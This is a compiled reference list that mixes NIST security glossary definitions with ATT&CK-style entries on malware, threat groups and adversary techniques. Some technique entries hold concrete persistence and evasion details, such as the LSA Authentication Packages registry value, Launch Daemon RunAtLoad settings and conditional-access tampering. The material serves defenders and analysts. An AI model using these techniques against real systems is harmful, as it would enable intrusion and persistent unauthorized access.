Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.

Term: audit log
Definition: A record providing documentary evidence of specific events.

Term: Security Status
Definition: The security status of an enterprise’s networks, information, and systems based on information security resources (e.g., people, hardware, software, policies) and capabilities in place to manage the defense of the enterprise and to react as the situation changes.

Name: INC Ransomware
Type: malware
Description: INC Ransomware is a ransomware strain that has been used by the INC Ransom group since at least 2023 against multiple industry sectors worldwide. INC Ransomware can employ partial encryption combined with multi-threading to speed encryption.

Term: approved
Definition: An algorithm or technique that is either 1) specified in a Federal Information Processing Standard (FIPS) or NIST Recommendation, 2) adopted in a FIPS or NIST Recommendation, or 3) specified in a list of NIST-approved security functions.

Term: cloud computing
Definition: A model for enabling ubiquitous, convenient, on-demand network access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications, and services) that can be rapidly provisioned and released with minimal management effort or service Provider interaction. This cloud model is composed of five essential characteristics, three service models, and four deployment models

Name: ODAgent
Type: malware
Description: ODAgent is a C#/.NET downloader that has been used by OilRig since at least 2022 including against target organizations in Israel to download and execute payloads and to exfiltrate staged files.

Term: authenticate
Definition: A process that provides assurance of the source and integrity of information in communications sessions, messages, documents or stored data or that provides assurance of the identity of an entity interacting with a system. See Source authentication, Identity authentication, and Integrity authentication.

Name: SharePoint ToolShell Exploitation
Type: campaign
Description: The SharePoint ToolShell Exploitation campaign was conducted in July 2025 and encompassed the first waves of exploitation against incompletely patched spoofing (CVE-2025-49706) and remote code execution (CVE-2025-49704) vulnerabilities affecting on-premises Microsoft SharePoint servers. Later patched and updated as CVE-2025-53770 and CVE-2025-53771, the ToolShell vulnerabilities were widely exploited including by China-based ransomware actor Storm-2603 and espionage actors Threat Group-3390 and ZIRCONIUM. SharePoint ToolShell Exploitation targeted multiple regions and industries including finance, education, energy, and healthcare across Asia, Europe, and the United States.

Term: Backup facility
Definition: A redundant system or service that is kept available for use in case of a failure of a primary facility.

Term: Privacy Requirements
Definition: A requirement that applies to an information system or an organization that is derived from applicable laws, executive orders, directives, policies, standards, regulations, procedures, and/or mission/business needs with respect to privacy.

Term: Triple Data Encryption Algorithm
Definition: Triple Data Encryption Algorithm; Triple DEA specified in [NIST SP 800-67].

Term: De-registration (of a key)
Definition: The inactivation of the records of a key that was registered by a registration authority.

Term: security specification
Definition: The requirements for the security-relevant portion of the system. 
Note: The security specification may be provided as a separate document or may be captured with a broader specification.

Term: risk analysis
Definition: Process to comprehend the nature of risk and to determine the level of risk.

Term: OVAL ID
Definition: An identifier for a specific OVAL definition that conforms to the format for OVAL IDs.

Term: Timestamp
Definition: A token or packet of information that is used to provide assurance of timeliness; the timestamp contains timestamped data, including a time, and a signature generated by a Trusted Timestamp Authority (TTA).

Term: Field Site
Definition: A subsystem that is identified by physical, geographical, or logical segmentation within the ICS. A field site may contain RTUs, PLCs, actuators, sensors, HMIs, and associated communications.

Term: salt
Definition: As used in this Recommendation, a byte string (which may be secret or non-secret) that is used as a MAC key by either: 1) a MAC-based auxiliary function H employed in one-step key derivation or 2) a MAC employed in the randomness-extraction step during two-step key derivation.

Term: cyber risk
Definition: Risk of financial loss, operational disruption, or damage, from the failure of the digital technologies employed for informational and/or operational functions introduced to a manufacturing system via electronic means from the unauthorized access, use, disclosure, disruption, modification, or destruction of the manufacturing system.

Term: EA
Definition: The description of an enterprise’s entire set of information systems: how they are configured, how they are integrated, how they interface to the external environment at the enterprise’s boundary, how they are operated to support the enterprise mission, and how they contribute to the enterprise’s overall security posture.

Term: Attribute Reference
Definition: A statement asserting a property of an entity without necessarily containing identity information, independent of format. For example, for the attribute "birthday," a reference could be "older than 18" or "born in December."

Term: security requirement
Definition: Requirements levied on an information system that are derived from applicable laws, Executive Orders, directives, policies, standards, instructions, regulations, procedures, or organizational mission/business case needs to ensure the confidentiality, integrity, and availability of the information being processed, stored, or transmitted.

Term: Similarity function
Definition: compares two similarity digests and outputs a score. The
recommended approach is to assign a score s in the 0 ≤ s ≤ 1 range, where 0 indicates no similarity and 1 indicates high similarity. This score represents a normalized estimate of the number of matching features in the feature sets corresponding to the artifacts from which the similarity digests were created.

Term: insider threat
Definition: An entity with authorized access that has the potential to harm an information system through destruction, disclosure, modification of data, and/or denial of service.

Name: PLEAD
Type: malware
Description: PLEAD is a remote access tool (RAT) and downloader used by BlackTech in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong. PLEAD has also been referred to as TSCookie, though more recent reporting indicates likely separation between the two. PLEAD was observed in use as early as March 2017.

Term: <em>0s</em>
Definition: For a positive integer s, 0s is the string that consists of s consecutive 0 bits.

Name: Authentication Package
Type: attack-pattern
Description: Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.

Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.

Term: concept mapping
Definition: An indication that one concept is related to another concept.

Term: 2FA
Definition: An authentication system that requires more than one distinct authentication factor for successful authentication. Multifactor authentication can be performed using a multifactor authenticator or by a combination of authenticators that provide different factors. The three authentication factors are something you know, something you have, and something you are.

Term: root user
Definition: A user that is authorized (and therefore, trusted) to have access to perform system control, monitoring, administration functions, or security-relevant functions that ordinary users are not authorized to perform.

Term: life cycle model
Definition: Framework of processes and activities concerned with the life cycle that may be organized into stages, which also acts as a common reference for communication and understanding.

Term: re-identification risk
Definition: The likelihood that a third party can re-identify data subjects in a de-identified dataset.

Term: Diffie-Hellman key exchange
Definition: The (non-cofactor) FFC Diffie-Hellman key-agreement primitive.

Name: RunningRAT
Type: malware
Description: RunningRAT is a remote access tool that appeared in operations surrounding the 2018 Pyeongchang Winter Olympics along with Gold Dragon and Brave Prince.

Term: reference monitor
Definition: A set of design requirements on a reference validation mechanism which as key component of an operating system, enforces an access control policy over all subjects and objects. A reference validation mechanism must be: (i) always invoked (i.e., complete mediation); (ii) tamperproof; and (iii) small enough to be subject to analysis and tests, the completeness of which can be assured (i.e., verifiable).

Term: Document Type Definition (DTD)
Definition: A document defining the format of the contents present between the tags in an XML or SGML document, and the way they should be interpreted by the application reading the XML or SGML document.

Term: Software Asset Management
Definition: An ISCM capability that identifies unauthorized software on devices that is likely to be used by attackers as a platform from which to extend compromise of the network to be mitigated.

Term: CT
Definition: A framework for publicly logging the existence of Transport Layer Security (TLS) certificates as they are issued or observed in a manner that allows anyone to audit CA activity and notice the issuance of suspect certificates as well as to audit the certificate logs themselves. (Experimental RFC 6962)

Term: systemic bias
Definition: A form of bias that results from rules, processes, or norms that advantage certain social groups and disadvantages others.

Term: assessment object
Definition: See Object, Assessment.

Term: Deterministic Random Bit Generator
Definition: An algorithm that produces a sequence of bits that are uniquely determined from an initial value called a seed. The output of the DRBG “appears” to be random, i.e., the output is statistically indistinguishable from random values. A cryptographic DRBG has the additional property that the output is unpredictable, given that the seed is not known. A DRBG is sometimes also called a Pseudo Random Number Generator (PRNG) or a deterministic random number generator.

Term: Security Audit Trail
Definition: A set of records that collectively provide documentary evidence of processing used to aid in tracing from original transactions forward to related records and reports, and/or backwards from records and reports to their component source transactions.

Name: Create Cloud Instance
Type: attack-pattern
Description: An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may Create Snapshot of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect Data from Local System or for Remote Data Staging.

Creating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.

Term: threat analysis
Definition: See threat assessment.

Term: system security plan
Definition: A document that describes how an organization meets or plans to meet the security requirements for a system. In particular, the system security plan describes the system boundary, the environment in which the system operates, how security requirements are implemented, and the relationships with or connections to other systems.

Term: <em><strong>leftmost (V, a)</strong></em>
Definition: The leftmost a bits of V.

Name: EvilGrab
Type: malware
Description: EvilGrab is a malware family with common reconnaissance capabilities. It has been deployed by menuPass via malicious Microsoft Office documents as part of spearphishing campaigns.

Term: Privacy Continuous Monitoring
Definition: Maintaining ongoing awareness of privacy risks and assessing privacy controls at a frequency sufficient to ensure compliance with applicable privacy requirements and to manage privacy risks.

Term: Secure Sockets Layer (SSL)
Definition: An authentication and security protocol widely implemented in browsers and web servers. TLS is defined by [RFC 2246], [RFC 3546], and [RFC 5246]. TLS is similar to the older Secure Sockets Layer (SSL) protocol, and TLS 1.0 is effectively SSL version 3.1. NIST SP 800-52, Guidelines for the Selection and Use of Transport Layer Security (TLS) Implementations specifies how TLS is to be used in government applications.

Term: Information System User
Definition: A person or entity with authorized access.

Term: allowed
Definition: The algorithm and key length in a FIPS or SP is safe to use; no security risk is currently known when used in accordance with any associated guidance. The FIPS 140 Implementation Guideline may indicate additional algorithms that are acceptable for use, but not specified in a FIPS or SP.

Term: Primary system
Definition: An FCKMS module that is currently active. Contrast with Backup (system).

Term: Capability, ISCM
Definition: A security capability with the following additional traits: 
• The purpose (desired result) of each capability is to address specific kind(s) of attack scenarios or exploits. 
• Each capability focuses on attacks towards specific assessment objects. 
• There is a viable way to automate ISCM on the security capability. 
• The capability provides protection against current attack scenarios.

Term: Blockchain technology
Definition: a term to describe the technology in the most generic form.

Term: capacity
Definition: The width of the underlying permutation minus the rate.

Term: access control
Definition: Restricts resource access to only privileged entities.

Name: Web Portal Capture
Type: attack-pattern
Description: Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.

This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through External Remote Services and Valid Accounts or as part of the initial compromise by exploitation of the externally facing web service.

Term: system security plan
Definition: A document that describes how an organization meets the security requirements for a system or how an organization plans to meet the requirements. In particular, the system security plan describes the system boundary, the environment in which the system operates, how security requirements are implemented, and the relationships with or connections to other systems.

Name: Exploits
Type: attack-pattern
Description: Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.

In addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals. In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).

An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.

Adversaries may use exploits during various phases of the adversary lifecycle (i.e. Exploit Public-Facing Application, Exploitation for Client Execution, Exploitation for Privilege Escalation, Exploitation for Stealth, Exploitation for Credential Access, Exploitation of Remote Services, and Application or System Exploitation).

Term: PII
Definition: Information that can be used to distinguish or trace an individual’s identity, either alone or when combined with other information that is linked or linkable to a specific individual.

Term: supervised learning
Definition: A type of machine learning in which a model learns to predict explicit (often human-generated) labels or output values for data.

Term: Core Root of Trust for Measurement (CRTM)
Definition: The first piece of BIOS code that executes on the main processor during the boot process. On a system with a Trusted Platform Module the CRTM is implicitly trusted to bootstrap the process of building a measurement chain for subsequent attestation of other firmware and software that is executed on the computer system.

Term: Triple Data Encryption Algorithm
Definition: Triple Data Encryption Algorithm specified in FIPS 46-3

Term: Scheme Owner
Definition: The entity that manages the labeling scheme and determines its structure and management and performs oversight to ensure that the scheme is functioning consistently with overall objectives.

Term: trusted recovery
Definition: Ability to ensure recovery without compromise after a system failure.

Term: LDAP
Definition: The Lightweight Directory Access Protocol, or LDAP, is a directory access protocol. In this document, LDAP refers to the protocol defined by RFC 1777, which is also known as LDAP V2. LDAP V2 describes unauthenticated retrieval mechanisms.

Term: P2
Definition: Second parameter of a card command

Term: domain
Definition: A distinct group of computers under a central administration or authority.

Term: Log Normalization
Definition: The conversion of information into consistent representations and categorizations.

Term: Custodian
Definition: A third-party entity that holds and safeguards a user’s private keys or digital assets on their behalf. Depending on the system, a custodian may act as an exchange and provide additional services, such as staking, lending, account recovery, or security features.

Term: <em>dP</em>
Definition: RSA private exponent for the prime factor p in the CRT format, i.e., d mod (p-1); an integer.

Term: AAD
Definition: The input data to the authenticated encryption function that is authenticated but not encrypted.

Term: message digest
Definition: The result of applying a hash function to a message. Also known as a “hash value.”

Term: denial of service (DoS)
Definition: The prevention of authorized access to resources or the delaying of time-critical operations. (Time-critical may be milliseconds or it may be hours, depending upon the service provided.)

Term: accreditation
Definition: The official management decision given by a senior agency official to authorize operation of an information system and to explicitly accept the risk to agency operations (including mission, functions, image, or reputation), agency assets, or individuals, based on the implementation of an agreed-upon set of security controls.

Term: Forward Cipher Function
Definition: One of the two functions of the block cipher algorithm that is determined by the choice of a cryptographic key.

Term: Inculpatory Evidence
Definition: Evidence that tends to increase the likelihood of fault or guilt.

Name: Conditional Access Policies
Type: attack-pattern
Description: Adversaries may disable or modify conditional access policies to enable persistent access to compromised accounts. Conditional access policies are additional verifications used by identity providers and identity and access management systems to determine whether a user should be granted access to a resource.

For example, in Entra ID, Okta, and JumpCloud, users can be denied access to applications based on their IP address, device enrollment status, and use of multi-factor authentication. In some cases, identity providers may also support the use of risk-based metrics to deny sign-ins based on a variety of indicators. In AWS and GCP, IAM policies can contain `condition` attributes that verify arbitrary constraints such as the source IP, the date the request was made, and the nature of the resources or regions being requested. These measures help to prevent compromised credentials from resulting in unauthorized access to data or resources, as well as limit user permissions to only those required. 

By modifying conditional access policies, such as adding additional trusted IP ranges, removing Multi-Factor Authentication requirements, or allowing additional Unused/Unsupported Cloud Regions, adversaries may be able to ensure persistent access to accounts and circumvent defensive measures.

Term: COMSEC chip set
Definition: Collection of NSA approved microchips. 
Rationale: The term falls under the broader term “COMSEC material”.

Term: <em>Tj</em>
Definition: The jth counter block.

Name: Lucifer
Type: malware
Description: Lucifer is a crypto miner and DDoS hybrid malware that leverages well-known exploits to spread laterally on Windows platforms.

Term: Key-establishment transaction
Definition: An instance of establishing secret keying material using a key-establishment scheme.

Name: Domain Generation Algorithms
Type: attack-pattern
Description: Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.

DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.

Adversaries may use DGAs for the purpose of Fallback Channels. When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.

Term: local authority
Definition: Organization responsible for generating and signing user certificates in a public key infrastructure (PKI)-enabled environment.

Term: discussion
Definition: Statements used to provide additional explanatory information for security controls or security control enhancements.

Term: IP Payload Compression Protocol
Definition: A protocol used to perform lossless compression for packet payloads.

Term: derived requirement
Definition: A requirement deduced or inferred from the collection and organization of requirements into a particular system configuration and solution.

Term: metadata
Definition: The information associated with a key that describes its specific characteristics, constraints, acceptable uses, ownership, etc.; sometimes called the key’s attributes.

Term: EMI
Definition: An electromagnetic disturbance that interrupts, obstructs, or otherwise degrades or limits the effective performance of electronics/electrical equipment.

Term: Session
Definition: A persistent interaction between a subscriber and an end point, either a relying party or a Credential Service Provider. A session begins with an authentication event and ends with a session termination event. A session is bound by use of a session secret that the subscriber’s software (a browser, application, or operating system) can present to the relying party or the Credential Service Provider in lieu of the subscriber’s authentication credentials.

Name: menuPass
Type: intrusion-set
Description: menuPass is a threat group that has been active since at least 2006. Individual members of menuPass are known to have acted in association with the Chinese Ministry of State Security's (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company.

menuPass has targeted healthcare, defense, aerospace, finance, maritime, biotechnology, energy, and government sectors globally, with an emphasis on Japanese organizations. In 2016 and 2017, the group is known to have targeted managed IT service providers (MSPs), manufacturing and mining companies, and a university.

Term: CPE Name
Definition: An identifier for a unique uniform resource identifier (URI) assigned to a specific platform type that conforms to the CPE specification.

Term: <em>b</em>
Definition: The bit length of a block.

Term: audit trail
Definition: A chronological record of system activities that is sufficient to enable the reconstruction and examination of the sequence of events and activities surrounding or leading to an operation, procedure, or event in a security-relevant transaction from inception to results.

Term: cyber survivability
Definition: The ability of warfighter systems to prevent, mitigate, recover from and adapt to adverse cyber-events that could impact mission-related functions by applying a risk-managed approach to achieve and maintain an operationally relevant risk posture throughout its life cycle.

Term: Retention period
Definition: The minimum amount of time that a key or other cryptographically related information should be retained.

Term: digital signature
Definition: The result of a cryptographic transformation of data that, when properly implemented, provides the services of origin authentication, data integrity, and signer nonrepudiation.

Name: Exfiltration to Code Repository
Type: attack-pattern
Description: Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.

Exfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network.

Term: ERR
Definition: A risk register at the enterprise level that contains normalized and aggregated inputs from subordinate organizations’ risk registers and profiles.

Term: SMTP
Definition: the primary protocol used to transfer electronic mail messages on the Internet.

Term: Web Browser
Definition: A software program that allows a user to locate, access, and display web pages.

Term: event
Definition: Occurrence or change of a particular set of circumstances.

Term: <em>Ij</em>
Definition: The jth input block.

Term: safeguards
Definition: An approved security measure taken to protect computational resources by eliminating or reducing the risk to a system, which may include hardware and software mechanisms, policies, procedures, and physical controls.

Term: federation authority
Definition: A party that facilitates the establishment and management of one or more trust agreements between federated parties. The federation authority can also provide other services, such as a federation proxy, discovery and registration support, and conformance evaluation.

Term: <em>CIPHK(X)</em>
Definition: The output of the forward cipher function of the block cipher under the key K applied to the block X.

Term: failover
Definition: The capability to switch over automatically (typically without human intervention or warning) to a redundant or standby information system upon the failure or abnormal termination of the previously active system.

Term: Certificate Chain
Definition: An ordered list of certificates that starts with an end-entity certificate, includes one or more certificate authority (CA) certificates, and ends with the end-entity certificate’s root CA certificate, where each certificate in the chain is the certificate of the CA that issued the previous certificate. By checking to see if each certificate in the chain was issued by a trusted CA, the receiver of an end-user certificate can determine whether or not it should trust the end-entity certificate by verifying the signatures in the chain of certificates.

Term: organizational user
Definition: An organizational employee or an individual whom the organization deems to have equivalent status of an employee, including a contractor, guest researcher, or individual detailed from another organization. Policies and procedures for granting the equivalent status of employees to individuals may include need-to-know, relationship to the organization, and citizenship.

Term: authority
Definition: A privacy principle (FIPP) that limits an organization's creation, collection, use, processing, storage, maintaining, disseminating, or disclosing of PII to activities for which they have authority to do so, and identify this authority in appropriate notices.

Term: Context of Use
Definition: Users, tasks, equipment (hardware, software and materials), and the physical and social environments in which a product is used.

Term: system of systems
Definition: System-of-interest whose system elements are themselves systems; typically, these entail large-scale interdisciplinary problems with multiple, heterogeneous, distributed systems.

Term: Flapping
Definition: A situation in which BGP sessions are repeatedly dropped and restarted, normally as a result of line or router problems.

Term: AAL
Definition: A category describing the strength of the authentication process.

Term: public key certificate
Definition: A set of data that uniquely identifies a key pair owner that is authorized to use the key pair, contains the owner’s public key and possibly other information, and is digitally signed by a Certification Authority (i.e., a trusted party), thereby binding the public key to the owner.

Name: Launch Daemon
Type: attack-pattern
Description: Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.

Adversaries may install a Launch Daemon configured to execute at startup by using the <code>RunAtLoad</code> parameter set to <code>true</code> and the <code>Program</code> parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. Masquerading). When the Launch Daemon is executed, the program inherits administrative permissions.

Additionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as <code>usr/local/bin</code> to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon's plist files.

Term: Root Certificate Authority (CA)
Definition: In a hierarchical public key infrastructure (PKI), the CA whose public key serves as the most trusted datum (i.e., the beginning of trust paths) for a security domain.

Term: DAC
Definition: A means of restricting access to objects (e.g., files, data entities) based on the identity and need-to-know of subjects (e.g., users, processes) and/or groups to which the object belongs. The controls are discretionary in the sense that a subject with a certain access permission is capable of passing that permission (perhaps indirectly) on to any other subject (unless restrained by mandatory access control).

Term: information technology product
Definition: See Authorization Boundary.

Name: Kobalos
Type: malware
Description: Kobalos is a multi-platform backdoor that can be used against Linux, FreeBSD, and Solaris. Kobalos has been deployed against high profile targets, including high-performance computers, academic servers, an endpoint security vendor, and a large internet service provider; it has been found in Europe, North America, and Asia. Kobalos was first identified in late 2019.

Name: Social Media
Type: attack-pattern
Description: Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.

Adversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into revealing specific information (i.e. Spearphishing Service). Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Technical Databases), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Spearphishing via Service).

Term: authorization to use
Definition: The official management decision given by an authorizing official to authorize the use of an information system, service, or application based on the information in an existing authorization package generated by another organization, and to explicitly accept the risk to agency operations (including mission, functions, image, or reputation), agency assets, individuals, other organizations, and the Nation based on the implementation of an agreed-upon set of controls in the system, service, or application.

Name: Havoc
Type: malware
Description: Havoc is an open-source post-exploitation command and control (C2) framework first released on GitHub in October 2022 by C5pider (Paul Ungur), who continues to maintain and develop it with community contributors. Havoc provides a wide range of offensive security capabilities and has been adopted by multiple threat actors to establish and maintain control over compromised systems.

Term: CPE Dictionary
Definition: A repository of identifier CPE names (WFNs in bound form) and associated metadata.

Name: Social Media Accounts
Type: attack-pattern
Description: Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.

For operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. 

Once a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others. These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: Spearphishing via Service).

Name: Woody RAT
Type: malware
Description: Woody RAT is a remote access trojan (RAT) that has been used since at least August 2021 against Russian organizations.

Term: public key certificate
Definition: A set of data that uniquely identifies an entity, contains the entity’s public key and possibly other information, and is digitally signed by a trusted party, thereby binding the public key to the entity. Additional information in the certificate could specify how the key is used and its validity period.

Term: comprehensive testing
Definition: A test methodology that assumes explicit and substantial knowledge of the internal structure and implementation detail of the assessment object.

Name: APT41
Type: intrusion-set
Description: APT41 is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, APT41 has been observed targeting various industries, including but not limited to healthcare, telecom, technology, finance, education, retail and video game industries in 14 countries. Notable behaviors include using a wide range of malware and tools to complete mission objectives. APT41 overlaps at least partially with public reporting on groups including BARIUM and Winnti Group.

Name: ShimRat
Type: malware
Description: ShimRat has been used by the suspected China-based adversary Mofang in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development. The name "ShimRat" comes from the malware's extensive use of Windows Application Shimming to maintain persistence.

Term: trusted path
Definition: A mechanism by which a user (through an input device) can communicate directly with the security functions of the system with the necessary confidence to support the system security policy. This mechanism can only be activated by the user or the security functions of the system and cannot be imitated by untrusted software.

Term: applicant reference
Definition: A representative of the applicant who can vouch for the identity of the applicant, specific attributes related to the applicant, or conditions relative to the context of the individual (e.g., emergency status, homelessness).

Term: hash function
Definition: An algorithm that computes a numerical value (called the hash value) on a data file or electronic message that is used to represent that file or message, and depends on the entire contents of the file or message. A hash function can be considered to be a fingerprint of the file or message.

Name: Email Accounts
Type: attack-pattern
Description: Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct Phishing for Information or Phishing. Establishing email accounts may also allow adversaries to abuse free services – such as trial periods – to Acquire Infrastructure for follow-on purposes.

Adversaries may also take steps to cultivate a persona around the email account, such as through use of Social Media Accounts, to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: Domains).

To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.

Name: AppleScript
Type: attack-pattern
Description: Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents. These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.

Scripts can be run from the command-line via <code>osascript /path/to/script</code> or <code>osascript -e "script here"</code>. Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding <code>#!/usr/bin/osascript</code> to the start of the script file.

AppleScripts do not need to call <code>osascript</code> to execute. However, they may be executed from within mach-O binaries by using the macOS Native APIs <code>NSAppleScript</code> or <code>OSAScript</code>, both of which execute code independent of the <code>/usr/bin/osascript</code> command line utility.

Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute Native APIs, which otherwise would require compilation and execution in a mach-O binary file format. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via Python.

Name: GRIFFON
Type: malware
Description: GRIFFON is a JavaScript backdoor used by FIN7.

Term: reference monitor
Definition: A set of design requirements on a reference validation mechanism that, as a key component of an operating system, enforces an access control policy over all subjects and objects. A reference validation mechanism is always invoked (i.e., complete mediation), tamperproof, and small enough to be subject to analysis and tests, the completeness of which can be assured (i.e., verifiable).

Term: direct prompt injection
Definition: A direct prompting attack in which the attacker exploits prompt injection.

Term: process
Definition: Set of interrelated or interacting activities that use inputs to deliver an intended result.

Term: identity
Definition: The set of physical and behavioral characteristics by which an individual is uniquely recognizable. 
Note: This also encompasses non-person entities (NPEs).

Name: LunarLoader
Type: malware
Description: LunarLoader is the loader component for the LunarWeb and LunarMail backdoors that has been used by Turla since at least 2020 including against a European ministry of foreign affairs (MFA). LunarLoader has been observed as a standalone and as a part of trojanized open-source software such as AdmPwd.

Term: safeguards
Definition: Protective measures prescribed to meet the security requirements (i.e., confidentiality, integrity, and availability) specified for a system. Safeguards may include security features, management constraints, personnel security, and security of physical structures, areas, and devices. Synonymous with security controls and countermeasures.

Term: Entropy
Definition: A measure of the amount of uncertainty that an Attacker faces to determine the value of a secret. Entropy is usually stated in bits. See Appendix A.

Term: Mesh
Definition: A key management architecture in which key processing facilities may interact with each other with no concept of dominance implied by the interaction.

Term: specification requirement
Definition: A type of requirement that provides a specification for a specific capability that implements all or part of a control and that may be assessed (i.e., as part of the verification, validation, testing, and evaluation processes).

Term: Measured service
Definition: Cloud systems automatically control and optimize resource use by leveraging a metering capability [1] at some level of abstraction appropriate to the type of service (e.g., storage, processing, bandwidth, and active user accounts). Resource usage can be monitored, controlled, and reported, providing transparency for both the provider and consumer of the utilized service.

Term: vulnerability analysis
Definition: Product or process of identifying attributes that render an entity, asset, system, network, or geographic area susceptible or exposed to threats.

Term: Service Provider
Definition: A provider of basic services or value-added services for operation of a network ­ generally refers to public carriers and other commercial enterprises.

Term: <em>X⊕Y</em>
Definition: Bit-wise inclusive-or of two bit-strings X and Y of the same bit length.

Term: incident handling
Definition: See “incident handling.”

Term: Cryptographic module
Definition: an embedded software component of a product or application, or a complete product in-and-of-itself that has one or more capabilities.

Name: CLAIMLOADER
Type: malware
Description: CLAIMLOADER is a malware variant that frequently accompanies legitimate executables that are used for DLL side-loading known to be leveraged by Mustang Panda and was first observed utilized in 2021.

Name: Revert Cloud Instance
Type: attack-pattern
Description: An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.

Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.

Term: multi-factor authentication
Definition: See authenticator type and multi-factor authenticator.

Term: approved
Definition: An algorithm or technique that is either specified or adopted in a FIPS publication or NIST Special Publication (SP) in the Computer Security SP 800 series (i.e., FIPS-approved or NIST-recommended).

Name: Serverless
Type: attack-pattern
